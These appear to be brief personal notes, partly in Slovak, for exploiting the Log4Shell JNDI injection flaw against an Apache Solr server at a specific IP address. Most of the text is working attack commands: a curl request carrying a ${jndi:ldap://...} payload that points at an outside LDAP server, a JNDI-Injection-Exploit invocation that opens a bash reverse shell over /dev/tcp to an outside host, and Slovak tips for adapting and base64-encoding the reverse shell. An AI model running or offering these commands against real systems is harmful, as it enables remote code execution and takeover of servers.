curl http://143.198.145.226:8983/solr/admin/cores?foo=$\{jndi:ldap://164.92.133.245:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C '/bin/bash -l > /dev/tcp/164.92.133.245/9999 0<&1 2>&1' -A 164.92.133.245


https://github.com/swisskyrepo/PayloadsAllTheThings - uprav reverse shell - /dev/bin -> a hod do echo

| base64 | tr -d "\n" | sed -e 's/+/%20/g' - preved revshell na base64

vytvor si solr username list




https://web.archive.org/web/20160914160324/https://download.oracle.com/otn/java/jdk/8u20-b26/jdk-8u20-linux-x64.tar.gz
